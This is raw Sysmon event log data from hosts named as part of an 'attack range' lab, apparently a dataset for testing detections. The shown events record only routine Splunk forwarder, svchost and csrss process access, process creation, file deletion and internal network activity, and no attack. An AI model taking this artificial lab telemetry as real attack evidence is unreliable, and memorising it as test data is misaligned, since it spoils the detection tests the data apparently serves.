11:21:46.618{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222233Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.618{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222232Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.618{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222231Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.618{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-18CA-6216-3405-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222230Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.618{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-18CA-6216-3405-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222229Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.619{4F8D34B0-18CA-6216-3405-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222228Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.383{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5A6989D960D42B2CD4F4386153844EC,SHA256=D4BED63EB7664ADA14457F67556CA750CF33406885464D1586F0E1FAF08DCE69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:46.365{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D8DA531E95CE180E62B0D5AE3FD753E,SHA256=1171F5D1DAC2AA67DDB9F5CEDEFE06CF9574BABACE74182FF7A201F533F22D11,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222227Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:43.604{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51704-false10.0.1.12-8000- 354300x8000000000000000298399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:45.714{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49528-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:47.380{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5D7E6CDFE1F0DFB68A9ACA1958BC1DA,SHA256=D0935EB654F31E14E0D8AEABFB72E7078D36B262142993CA4DED400586B7BA9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222256Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.321{4F8D34B0-18CB-6216-3505-000000003902}40883716C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222255Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-18CB-6216-3505-000000003902}4088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222254Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222253Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222252Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222251Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222250Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222249Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222248Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-18CB-6216-3505-000000003902}4088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222247Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222246Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222245Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222244Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.118{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-18CB-6216-3505-000000003902}4088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222243Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:47.119{4F8D34B0-18CB-6216-3505-000000003902}4088C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000298401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:48.911{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:48.411{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03B7172ECF284A0FFAD9E8FC7C0D51B6,SHA256=6F3195D775C815C5E16B798610E23AA75E954562F30E6F1E030025E26622CF39,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222272Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.977{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-18CC-6216-3605-000000003902}3116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222271Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.977{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222270Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:48.977{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222269Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 